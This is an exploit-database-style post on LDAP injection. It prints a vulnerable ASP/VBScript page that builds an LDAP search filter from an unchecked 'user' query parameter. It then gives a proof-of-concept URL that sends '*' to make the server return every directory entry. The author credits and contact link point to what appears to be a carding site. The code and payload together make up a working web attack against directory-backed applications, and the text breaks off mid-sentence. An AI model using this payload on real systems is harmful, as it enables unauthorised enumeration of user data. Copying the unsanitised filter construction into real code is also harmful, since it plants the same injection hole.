[+] Vulnerability : LDAP Injection
[+] Category : Implemented Web exploit
[+] Category : Attack Technique
[+] Author : mc2_s3lector
[+] dork : X/o\"
[+] Contact : www.yogyacarderlink.web.id
[+] date : 4-2-10
[+] biGthank to : Allah SWT,jasakom,KeDai Computerworks,0n3-d4y n3ro,eplaciano, all*.indonesian like a coding,
---------------------------------------------------------------------------------------------------------------------------------------------------
Directory access protocol/directory manipulation, protocol breaker -> standard protocol, custom query statement, page request, component execute command, database server, web apps services modify, remove etc.
---------------------------------------------------------------------------------------------------------------------------------------------------
code:

<%@ Language=VBScript %>
<html>
<body>
<%
Dim userName
Dim filter
Dim ldapObj
Dim i

Const LDAP_SERVER = "ldap.example"

' (*1) LOOK AT THIS LINE, the bug: the user parameter is taken from the
'      request and is only checked for being empty
userName = Request.QueryString("user")

If ( userName = "" ) Then
    Response.Write("<b>Invalid request. Please specify a valid user name</b><br>")
    Response.End()
End If

' userName from (*1) is used to initialize the filter variable on this line;
' it goes directly into the LDAP query through the filter set at (*3)
filter = "(uid=" + CStr(userName) + ")" ' searching for the user entry

'Create the LDAP object and set the base dn
Set ldapObj = Server.CreateObject("IPWorksASP.LDAP")
ldapObj.ServerName = LDAP_SERVER
ldapObj.DN = "ou=people,dc=spilab,dc=com"

'Setting the search filter
ldapObj.SearchFilter = filter ' (*3) <--- SearchFilter is called on this line
ldapObj.Search

'Showing the user enumeration info
While ldapObj.result = 1 ' (*4) the results are read from here to (*5)
    Response.Write("<p>")
    Response.Write("<b><u>User information for : " + ldapObj.AttrValue(0) + "</u></b><br>")
    For i = 0 To ldapObj.AttrCount -1
        Response.Write("<b>" + ldapObj.AttrType(i) + "</b> : " + ldapObj.AttrValue(i) + "<br>" )
    Next
    Response.Write("</p>")
Wend ' (*5)
%>
</body>
</html>
---------------------------------------------------------------------------------------------------------------------------------------------------
Control over the LDAP query sent to the LDAP server & get the query result from (*4 to *5)
POC:
http://server/ldapsearch.asp?user=*
<---- send the * character in the parameter user; as a result the filter variable in the code is initialized with (uid=*). The resulting LDAP statement will make the server return
---------------------------------------------------------------------------------------------------------------------------------------------------